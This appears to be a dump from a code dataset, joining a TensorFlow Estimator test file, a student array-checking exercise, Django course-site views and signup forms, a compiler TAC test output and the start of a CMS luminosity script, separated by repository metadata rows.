est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
with self.assertRaises(tf.contrib.learn.NotFittedError):
_ = est.evaluate(
x=boston.data,
y=boston.target.astype(np.float64))
with self.assertRaises(tf.contrib.learn.NotFittedError):
est.predict(x=boston.data)
def testContinueTraining(self):
boston = tf.contrib.learn.datasets.load_boston()
output_dir = tempfile.mkdtemp()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn,
model_dir=output_dir)
float64_target = boston.target.astype(np.float64)
est.fit(x=boston.data, y=float64_target, steps=50)
scores = est.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
del est
# Create another estimator object with the same output dir.
est2 = tf.contrib.learn.Estimator(model_fn=linear_model_fn,
model_dir=output_dir)
# Check we can evaluate and predict.
scores2 = est2.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
self.assertAllClose(scores2['MSE'],
scores['MSE'])
predictions = est2.predict(x=boston.data)
other_score = _sklearn.mean_squared_error(predictions, float64_target)
self.assertAllClose(other_score, scores['MSE'])
# Check we can keep training.
est2.fit(x=boston.data, y=float64_target, steps=100)
scores3 = est2.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
self.assertLess(scores3['MSE'], scores['MSE'])
def testEstimatorParams(self):
boston = tf.contrib.learn.datasets.load_boston()
est = tf.contrib.learn.Estimator(model_fn=linear_model_params_fn,
params={'learning_rate': 0.01})
est.fit(x=boston.data, y=boston.target, steps=100)
def testBostonAll(self):
boston = tf.contrib.learn.datasets.load_boston()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
float64_target = boston.target.astype(np.float64)
est.fit(x=boston.data, y=float64_target, steps=100)
scores = est.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
predictions = est.predict(x=boston.data)
other_score = _sklearn.mean_squared_error(predictions, boston.target)
self.assertAllClose(other_score, scores['MSE'])
self.assertTrue('global_step' in scores)
self.assertEqual(scores['global_step'], 100)
def testIrisAll(self):
iris = tf.contrib.learn.datasets.load_iris()
est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
est.fit(iris.data, iris.target, steps=100)
scores = est.evaluate(
x=iris.data,
y=iris.target,
metrics={('accuracy', 'class'): tf.contrib.metrics.streaming_accuracy})
predictions = est.predict(x=iris.data)
predictions_class = est.predict(x=iris.data, outputs=['class'])
self.assertEqual(predictions['class'].shape[0], iris.target.shape[0])
self.assertAllClose(predictions['class'], predictions_class['class'])
self.assertAllClose(predictions['class'], np.argmax(predictions['prob'],
axis=1))
other_score = _sklearn.accuracy_score(iris.target, predictions['class'])
self.assertAllClose(other_score, scores['accuracy'])
self.assertTrue('global_step' in scores)
self.assertEqual(scores['global_step'], 100)
def testIrisInputFn(self):
iris = tf.contrib.learn.datasets.load_iris()
est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
est.fit(input_fn=iris_input_fn, steps=100)
_ = est.evaluate(input_fn=iris_input_fn, steps=1)
predictions = est.predict(x=iris.data)['class']
self.assertEqual(predictions.shape[0], iris.target.shape[0])
def testIrisIterator(self):
iris = tf.contrib.learn.datasets.load_iris()
est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
x_iter = itertools.islice(iris.data, 100)
y_iter = itertools.islice(iris.target, 100)
est.fit(x_iter, y_iter, steps=100)
_ = est.evaluate(input_fn=iris_input_fn, steps=1)
predictions = est.predict(x=iris.data)['class']
self.assertEqual(predictions.shape[0], iris.target.shape[0])
def testTrainInputFn(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=1)
_ = est.evaluate(input_fn=boston_eval_fn, steps=1)
def testTrainStepsIsIncremental(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=10)
self.assertEqual(10, est.get_variable_value('global_step'))
est.fit(input_fn=boston_input_fn, steps=15)
self.assertEqual(25, est.get_variable_value('global_step'))
def testTrainMaxStepsIsNotIncremental(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, max_steps=10)
self.assertEqual(10, est.get_variable_value('global_step'))
est.fit(input_fn=boston_input_fn, max_steps=15)
self.assertEqual(15, est.get_variable_value('global_step'))
def testPredict(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
output = est.predict(boston.data)
self.assertEqual(output.shape[0], boston.target.shape[0])
def testPredictInputFn(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
output = est.predict(input_fn=boston_input_fn)
self.assertEqual(output.shape[0], boston.target.shape[0])
def testPredictAsIterable(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
self.assertEqual(
len(list(est.predict(boston.data, batch_size=10, as_iterable=True))),
boston.target.shape[0])
def testPredictInputFnAsIterable(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
input_fn = functools.partial(boston_input_fn, num_epochs=1)
self.assertEqual(
len(list(est.predict(input_fn=input_fn, as_iterable=True))),
boston.target.shape[0])
def testWrongInput(self):
def other_input_fn():
return {'other': tf.constant([0, 0, 0])}, tf.constant([0, 0, 0])
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=1)
with self.assertRaises(ValueError):
est.fit(input_fn=other_input_fn, steps=1)
def testMonitors(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn,
steps=21,
monitors=[CheckCallsMonitor(expect_calls=21)])
def testSummaryWriting(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=200)
est.evaluate(input_fn=boston_input_fn, steps=200)
loss_summary = tf.contrib.testing.simple_values_from_events(
tf.contrib.testing.latest_events(est.model_dir), ['loss'])
self.assertEqual(len(loss_summary), 1)
def testLossInGraphCollection(self):
class _LossCheckerHook(tf.train.SessionRunHook):
def begin(self):
self.loss_collection = tf.get_collection(tf.GraphKeys.LOSSES)
hook = _LossCheckerHook()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=200, monitors=[hook])
self.assertTrue(hook.loss_collection)
def test_export_returns_exported_dirname(self):
expected = '/path/to/some_dir'
with tf.test.mock.patch.object(estimator, 'export') as mock_export_module:
mock_export_module._export_estimator.return_value = expected
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
actual = est.export('/path/to')
self.assertEquals(actual, expected)
class InferRealValuedColumnsTest(tf.test.TestCase):
def testInvalidArgs(self):
with self.assertRaisesRegexp(ValueError, 'x or input_fn must be provided'):
tf.contrib.learn.infer_real_valued_columns_from_input(None)
with self.assertRaisesRegexp(ValueError, 'cannot be tensors'):
tf.contrib.learn.infer_real_valued_columns_from_input(tf.constant(1.0))
def _assert_single_feature_column(
self, expected_shape, expected_dtype, feature_columns):
self.assertEqual(1, len(feature_columns))
feature_column = feature_columns[0]
self.assertEqual('', feature_column.name)
self.assertEqual({
'': tf.FixedLenFeature(shape=expected_shape, dtype=expected_dtype)
}, feature_column.config)
def testInt32Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.int32))
self._assert_single_feature_column([8], tf.int32, feature_columns)
def testInt32InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.int32), None))
self._assert_single_feature_column([8], tf.int32, feature_columns)
def testInt64Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.int64))
self._assert_single_feature_column([8], tf.int64, feature_columns)
def testInt64InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.int64), None))
self._assert_single_feature_column([8], tf.int64, feature_columns)
def testFloat32Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.float32))
self._assert_single_feature_column([8], tf.float32, feature_columns)
def testFloat32InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.float32), None))
self._assert_single_feature_column([8], tf.float32, feature_columns)
def testFloat64Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.float64))
self._assert_single_feature_column([8], tf.float64, feature_columns)
def testFloat64InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.float64), None))
self._assert_single_feature_column([8], tf.float64, feature_columns)
def testBoolInput(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
tf.contrib.learn.infer_real_valued_columns_from_input(
np.array([[False for _ in xrange(8)] for _ in xrange(7)]))
def testBoolInputFn(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.constant(False, shape=[7, 8], dtype=tf.bool), None))
def testStringInput(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input(
np.array([['%d.0' % i for i in xrange(8)] for _ in xrange(7)]))
def testStringInputFn(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (
tf.constant([['%d.0' % i for i in xrange(8)] for _ in xrange(7)]),
None))
def testBostonInputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
boston_input_fn)
self._assert_single_feature_column(
[_BOSTON_INPUT_DIM], tf.float64, feature_columns)
def testIrisInputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
iris_input_fn)
self._assert_single_feature_column(
[_IRIS_INPUT_DIM], tf.float64, feature_columns)
class ReplicaDeviceSetterTest(tf.test.TestCase):
def testVariablesAreOnPs(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=1))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('/job:ps/task:0', v.device)
self.assertDeviceEqual('/job:ps/task:0', v.initializer.device)
self.assertDeviceEqual('/job:ps/task:0', w.device)
self.assertDeviceEqual('/job:ps/task:0', w.initializer.device)
self.assertDeviceEqual('/job:worker', a.device)
def testVariablesAreLocal(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=0))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('', v.device)
self.assertDeviceEqual('', v.initializer.device)
self.assertDeviceEqual('', w.device)
self.assertDeviceEqual('', w.initializer.device)
self.assertDeviceEqual('', a.device)
def testMutableHashTableIsOnPs(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=1))):
default_val = tf.constant([-1, -1], tf.int64)
table = tf.contrib.lookup.MutableHashTable(tf.string,
tf.int64,
default_val)
input_string = tf.constant(['brain', 'salad', 'tank'])
output = table.lookup(input_string)
self.assertDeviceEqual('/job:ps/task:0', table._table_ref.device)
self.assertDeviceEqual('/job:ps/task:0', output.device)
def testMutableHashTableIsLocal(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=0))):
default_val = tf.constant([-1, -1], tf.int64)
table = tf.contrib.lookup.MutableHashTable(tf.string,
tf.int64,
default_val)
input_string = tf.constant(['brain', 'salad', 'tank'])
output = table.lookup(input_string)
self.assertDeviceEqual('', table._table_ref.device)
self.assertDeviceEqual('', output.device)
def testTaskIsSetOnWorkerWhenJobNameIsSet(self):
with tf.device(
estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(
num_ps_replicas=1, job_name='worker', task=3))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('/job:ps/task:0', v.device)
self.assertDeviceEqual('/job:ps/task:0', v.initializer.device)
self.assertDeviceEqual('/job:ps/task:0', w.device)
self.assertDeviceEqual('/job:ps/task:0', w.initializer.device)
self.assertDeviceEqual('/job:worker/task:3', a.device)
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
]
| |
99971c0b16dacf336e6bb8cfec3810444af31ef1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2882/39190/304719.py | 48b5449910760181ac3be5702cc6fd925bd7e81f | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | def func3(arr):
arr.reverse()
rra=arr
arr.reverse()
peak=max(arr)
if arr.index(peak)>0:
for i in range(arr.index(peak)-1):
if int(arr[i])>=int(arr[i+1]):
return False
if arr.index(peak)<len(arr)-rra.index(peak)-1:
for i in range(arr.index(peak),len(arr)-rra.index(peak)-2):
if int(arr[i])!=int(arr[i+1]):
return False
if rra.index(peak)>0:
for i in range(len(arr)-rra.index(peak)-1,len(arr)-1):
if int(arr[i])<=int(arr[i+1]):
return False
return True
ip=input()
arr=input().split(" ")
op=func3(arr)
if op==True:
print("YES")
else:
print("NO") | [
"[email protected]"
]
| |
daa228415a1b3cdca8c7512fe938035567946c7a | fcfd7f52a5592a5f4f46940c78634bf7f40c2ef5 | /apps/organization/views.py | 5ca8e34bde2db550cbfe23ba3b9c388ffa6e1858 | []
| no_license | fank-cd/course_ol_exercise | 0acdca8088c145c7bff9b54a68b62de0eb1c0510 | 10a504a0cfa9bf7754ff7da8e504135e82fdd169 | refs/heads/master | 2020-03-26T05:12:46.040472 | 2018-08-13T07:48:19 | 2018-08-13T07:48:19 | 144,265,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,775 | py | # coding:utf-8
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic.base import View
from django.db.models import Q
from courses.models import Course
from operation.models import UserFavorite
from .models import CourseOrg, CityDict, Teacher
from .forms import UserAskForm
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
# Create your views here.
class OrgView(View):
def get(self, request):
all_orgs = CourseOrg.objects.all()
for org in all_orgs:
org.course_nums = org.course_set.count()
org.save()
all_citys = CityDict.objects.all()
hot_orgs = all_orgs.order_by("-click_nums")[:3]
search_keywords = request.GET.get('keywords', '')
if search_keywords:
all_orgs = all_orgs.filter(Q(name__icontains=search_keywords) | Q(desc__contains=search_keywords)
| Q(address__icontains=search_keywords))
city_id = request.GET.get('city', '')
category = request.GET.get('ct', '')
sort = request.GET.get('sort', '')
if sort:
if sort == 'students':
all_orgs = all_orgs.order_by("-students")
if sort == "courses":
all_orgs = all_orgs.order_by("-course_nums")
if city_id:
all_orgs = all_orgs.filter(city_id=int(city_id))
if category:
all_orgs = all_orgs.filter(category=category)
org_nums = all_orgs.count()
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_orgs, 4, request=request)
orgs = p.page(page)
context = {'all_orgs': orgs, "all_citys": all_citys, 'org_nums': org_nums,
"city_id": city_id, "category": category, "hot_orgs": hot_orgs, "sort": sort,
"search_keywords": search_keywords}
return render(request, "org-list.html", context=context)
class AddUserAskView(View):
def post(self,request):
userask_form = UserAskForm(request.POST)
if userask_form.is_valid():
user_ask = userask_form.save(commit=True)
return HttpResponse('{"status":"success"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"您的字段有错误,请检查"}',
content_type='application/json')
class OrgHomeView(View):
def get(self, request, org_id):
course_org = CourseOrg.objects.get(id=int(org_id))
all_courses = course_org.course_set.all()[:4]
all_teachers = course_org.teacher_set.all()[:2]
current_page = 'home'
has_fav = False
course_org.click_nums += 1
course_org.save()
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-homepage.html', {
'course_org': course_org,
'all_courses': all_courses,
'all_teacher': all_teachers,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgCourseView(View):
def get(self, request, org_id):
course_org = CourseOrg.objects.get(id=int(org_id))
all_course = course_org.course_set.all()
current_page = 'course'
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-course.html', {
'all_courses': all_course,
'course_org': course_org,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgDescView(View):
def get(self, request, org_id):
current_page = 'desc'
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-desc.html', {
'course_org': course_org,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgTeacherView(View):
def get(self, request, org_id):
current_pgae = "teacher"
course_org = CourseOrg.objects.get(id=int(org_id))
all_teachers = course_org.teacher_set.all()
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-teachers.html', {
'all_teachers': all_teachers,
'course_org': course_org,
'current_page': current_pgae,
'has_fav': has_fav,
})
class AddFavView(View):
"""
用户收藏与取消收藏功能
"""
def post(self, request):
id = request.POST.get('fav_id', 0)
type = request.POST.get('fav_type', 0)
if request.user.is_authenticated():
exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(id), fav_type=int(type))
if exist_records:
# 如果记录已经存在, 则表示用户取消收藏
exist_records.delete()
if int(type) == 1:
course = Course.objects.get(id=int(id))
course.fav_nums -= 1
if course.fav_nums < 0:
course.fav_nums = 0
course.save()
elif int(type) == 2:
org = CourseOrg.objects.get(id=int(id))
org.fav_nums -= 1
if org.fav_nums < 0:
org.fav_nums = 0
org.save()
elif int(type) == 3:
teacher = Teacher.objects.get(id=int(id))
teacher.fav_nums -= 1
if teacher.fav_nums < 0:
teacher.fav_nums = 0
teacher.save()
return HttpResponse('{"status":"success", "msg":"收藏"}', content_type='application/json')
else:
user_fav = UserFavorite()
# 过滤掉未取到fav_id type的默认情况
if int(type) > 0 and int(id) > 0:
user_fav.fav_id = int(id)
user_fav.fav_type = int(type)
user_fav.user = request.user
user_fav.save()
if int(type) == 1:
course = Course.objects.get(id=int(id))
course.fav_nums += 1
course.save()
elif int(type) == 2:
org = CourseOrg.objects.get(id=int(id))
org.fav_nums += 1
org.save()
elif int(type) == 3:
teacher = Teacher.objects.get(id=int(id))
teacher.fav_nums += 1
teacher.save()
return HttpResponse('{"status":"success", "msg":"已收藏"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"收藏出错"}', content_type='application/json')
else:
print "dd"
return HttpResponse('{"status":"fail", "msg":"用户未登录"}', content_type='application/json')
class TeacherListView(View):
def get(self, request):
all_teacher = Teacher.objects.all()
teacher_nums = all_teacher.count()
sort = request.GET.get("sort", "")
if sort:
if sort == 'hot':
all_teacher = all_teacher.order_by('-click_nums')
search_keywords = request.GET.get('keywords', '')
if search_keywords:
all_teacher = all_teacher.filter(Q(name__icontains=search_keywords) |
Q(work_company__contains=search_keywords))
rank_teachers = Teacher.objects.all().order_by("-fav_nums")[:5]
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_teacher, 4, request=request)
teachers = p.page(page)
return render(request, "teachers-list.html", {
"all_teacher": teachers,
"teacher_nums": teacher_nums,
'sort': sort,
"rank_teachers": rank_teachers,
"search_keywords": search_keywords,
})
class TeacherDetailView(View):
def get(self, request, teacher_id):
teacher = Teacher.objects.get(id=int(teacher_id))
all_course = teacher.course_set.all()
teacher.click_nums += 1
teacher.save()
rank_teacher = Teacher.objects.all().order_by("fav_nums")[:5]
has_hav_teacher = False
has_hav_org = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_type=3, fav_id=teacher.id):
has_hav_teacher = True
if UserFavorite.objects.filter(user=request.user, fav_type=2, fav_id=teacher.org.id):
has_hav_org = True
return render(request, "teacher-detail.html", {
"teacher": teacher,
"all_course": all_course,
"rank_teacher": rank_teacher,
"has_fav_teacher": has_hav_teacher,
"has_hav_org": has_hav_org,
})
| [
"[email protected]"
]
| |
9683287354e0075e12fd77dad8cf739231fb23f6 | 0ac4831465d0273effd087c75484474985fd1106 | /link_rec/forms.py | ae67ff1282aa8f0d1c546ad426aa3d76d792747d | []
| no_license | duggalr2/linkedin_recommend | af2a040b69cca4f190b8fe064f8048c0b412483c | d535df1643f2a37b8473962f496d83464aa839f3 | refs/heads/master | 2020-12-02T22:39:51.501151 | 2017-12-05T16:19:58 | 2017-12-05T16:19:58 | 96,162,172 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,627 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.forms import formset_factory, ModelForm
INDUSTRY_CHOICES = (
('software', 'Software'),
('engineering', 'Engineering, excluding Software'),
('research', 'Research'),
('design', 'Design'),
('data_science', 'Data Science'),
('product_manager', 'Product Manager'),
('business_finance', 'Business and Finance'),
('startup_founder', 'Startup Founders/Executives'),
('admin_coordination', 'Startup Founders/Executives'),
('startup_founder', 'Admin/Coordination/IT/HR'),
('crypto_blockchain', 'Cryptography/Blockchain')
)
SCHOOL_NAMES = (
('university_of_toronto', 'University of Toronto'),
('harvard', 'Harvard University'),
('massachusetts_institute_of_technology', 'Massachusetts Institute of Technology'),
('waterloo', 'University of Waterloo'),
('stanford', 'Stanford University'),
('western', 'Western University'),
('university_of_california_berkeley', 'University of California, Berkeley'),
('caltech', 'Caltech'),
('cornell', 'Cornell University'),
('oxford', 'Oxford University'),
('carnegie_mellon_university', 'Carnegie Mellon University'),
('university_of_pennsylvania', 'University of Pennsylvania'),
('cambridge', 'University of Cambridge'),
('university_of_california_los_angeles', 'University of California, Los Angeles'),
('queens', "Queen's University"),
('columbia', 'Columbia University')
)
PROGRAM_CHOICES = (
('computer_science', 'Computer Science'),
('commerce_business', 'Commerce/Business/Finance'),
('humanities_lifesci', 'Humanities/LifeSci/HealthSci'),
('math_physics_statistics', 'Math/Physics/Statistics'),
('engineering', 'Engineering'),
)
class SignUpForm(UserCreationForm):
# this will add additional fields to the built-in User Creation Form
school = forms.ChoiceField(choices=SCHOOL_NAMES,)
school_program = forms.ChoiceField(choices=PROGRAM_CHOICES, )
industry_of_interest = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=INDUSTRY_CHOICES, )
school_of_interest = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=SCHOOL_NAMES, )
name = forms.CharField(max_length=250)
class Meta:
model = User
fields = ('name', 'username', 'password1', 'password2', 'school', 'school_program', 'industry_of_interest', 'school_of_interest')
MISCLASSIFY_SELECTION = (
('education_program', 'Education Program'),
('job_industry', 'Job Industry'),
)
class MisClassify(forms.Form):
first_selection = forms.ChoiceField(choices=MISCLASSIFY_SELECTION, )
class InitialEduClassify(forms.Form):
pass
class JobMisClassify(forms.Form):
# edu_correct = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
def __init__(self, *args, **kwargs):
extra = kwargs.pop('extra')
super(JobMisClassify, self).__init__(*args, **kwargs)
for i, job in enumerate(extra):
self.fields['custom_%s' % i] = forms.ChoiceField(label=job, choices=INDUSTRY_CHOICES, required=False)
# self.fields['custom_%s' % i] = forms.CharField(label=job, max_length=250, required=False)
def extra_answers(self):
for name, value in self.cleaned_data.items():
if name.startswith('custom_'):
yield (self.fields[name].label, value)
# super(EducationMisClassify, self).__init__(*args, **kwargs)
# for i in range(0, n):
# self.fields["edu_correct %d" % i] = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
# edu_correct = forms.CharField(max_length=250)
class EducationMisClassify(forms.Form):
edu_correct = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
# job_selection = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=(('job1', 'Default Job 1'),))
#class AuthorForm(ModelForm):
# class Meta:
# model = Author
# fields = ['name', 'title', 'birth_date']
#
#
#class BookForm(ModelForm):
# class Meta:
# model = Book
# fields = ['name', 'authors']
#
#
#class MultiWidgetBasic(forms.widgets.MultiWidget):
# def __init__(self, attrs=None):
# widgets = [forms.TextInput(),
# forms.TextInput()]
# super(MultiWidgetBasic, self).__init__(widgets, attrs)
#
# def decompress(self, value):
# if value:
# return pickle.loads(value)
# else:
# return ['', '']
#
#
#class MultiExampleField(forms.fields.MultiValueField):
# widget = MultiWidgetBasic
#
# def __init__(self, *args, **kwargs):
# list_fields = [forms.fields.CharField(max_length=31),
# forms.fields.CharField(max_length=31)]
# super(MultiExampleField, self).__init__(list_fields, *args, **kwargs)
#
# def compress(self, values):
# return pickle.dumps(values)
#
#
#class FormForm(forms.Form):
# a = forms.BooleanField()
# b = forms.CharField(max_length=32)
# c = forms.CharField(max_length=32, widget=forms.widgets.Textarea())
# d = forms.CharField(max_length=32, widget=forms.widgets.SplitDateTimeWidget())
# e = forms.CharField(max_length=32, widget=MultiWidgetBasic())
# f = MultiExampleField()
#
# class UserForm(forms.ModelForm):
# class Meta:
# model = User
# fields = ('first_name', 'last_name', 'email')
#
#
# class ProfileForm(forms.ModelForm):
# class Meta:
# model = Profile
# fields = ('bio', 'location', 'birth_date')
| [
"[email protected]"
]
| |
b40e44faa5e369870bc288871dc9c304d99d2c3e | 34474048ec5c4850623cf0fea993b43de76fada4 | /Tests/unittest/code_gen/tac_o1/mix_global_local_nested_int_char_array.tac | 3af956749d4f00960c094f9db45c8c0e838c9ba5 | []
| no_license | imsure/C-- | 69a80e152936e31b14319ab16c2317d2cacc9165 | 9991e7135d6ebc8f6f08f46f37b82bfe353ec17f | refs/heads/master | 2021-01-13T02:04:07.295401 | 2015-05-01T01:26:07 | 2015-05-01T01:26:07 | 30,732,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | tac | main:
Enter main 108
_taddr0 = x + 0
*_taddr0(int) = 0
_taddr1 = y + 0
*_taddr1(char) = 1
_taddr2 = x + 4
*_taddr2(int) = 1
_taddr3 = y + 1
*_taddr3(char) = 2
_taddr4 = x + 8
*_taddr4(int) = 2
_taddr5 = y + 2
*_taddr5(char) = 3
_taddr6 = x + 12
*_taddr6(int) = 3
_taddr7 = y + 3
*_taddr7(char) = 4
_taddr8 = x + 16
*_taddr8(int) = 4
_taddr9 = y + 4
*_taddr9(char) = 55
_taddr10 = x + 0
_tvar0 = *_taddr10(int) * 1
_taddr11 = y + _tvar0
_tvar0 = *_taddr11(char) * 4
_taddr12 = x + _tvar0
_tvar0 = *_taddr12(int) * 1
_taddr13 = y + _tvar0
_tvar0 = *_taddr13(char) * 4
_taddr14 = x + _tvar0
_tvar0 = *_taddr14(int) * 1
_taddr15 = y + _tvar0
_tvar0 = *_taddr15(char) * 4
_taddr16 = x + _tvar0
_tvar0 = *_taddr16(int) * 1
_taddr17 = y + _tvar0
_tvar0 = *_taddr17(char) * 4
_taddr18 = x + _tvar0
_tvar0 = *_taddr18(int) * 1
_taddr19 = y + _tvar0
u = *_taddr19(char)
Param u
Call print_int 1
_tstr0 = "\n"
Param _tstr0
Call print_string 1
Return
| [
"[email protected]"
]
| |
259ffde6c20e473442c24385d68c132bf7ce4779 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /RecoLuminosity/LumiDB/scripts/specificLumi.py | 916399856d1c2d32dd8f1828936869fa5f3be98f | []
| permissive | amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | 2021-01-19T16:18:22.857382 | 2016-08-09T16:40:50 | 2016-08-09T16:40:50 | 262,608,661 | 0 | 0 | Apache-2.0 | 2020-05-09T16:10:07 | 2020-05-09T16:10:07 | null | UTF-8 | Python | false | false | 20,778 | py | #!/usr/bin/env python
########################################################################
# Command to produce perbunch and specific lumi #
# #
# Author: Zhen Xie #
########################################################################
#
# dump all fills into files.
# allfills.txt all the existing fills.
# fill_num.txt all the runs in the fill
# dumpFill -o outputdir
# dumpFill -f fillnum generate runlist for the given fill
#
import os,os.path,sys,math,array,datetime,time,calendar,re
import coral
from RecoLuminosity.LumiDB import argparse,sessionManager,lumiTime,CommonUtil,lumiCalcAPI,lumiParameters,revisionDML,normDML
MINFILL=1800
MAXFILL=9999
allfillname='allfills.txt'
def getFillFromDB(schema,fillnum):
'''
output: {run:starttime}
'''
runtimesInFill={}
fillrundict=lumiCalcAPI.fillrunMap(schema,fillnum)
if len(fillrundict)>0:
runs=fillrundict.values()[0]
runlsdict=dict(zip(runs,[None]*len(runs)))
runresult=lumiCalcAPI.runsummary(schema,runlsdict)
for perrundata in runresult:
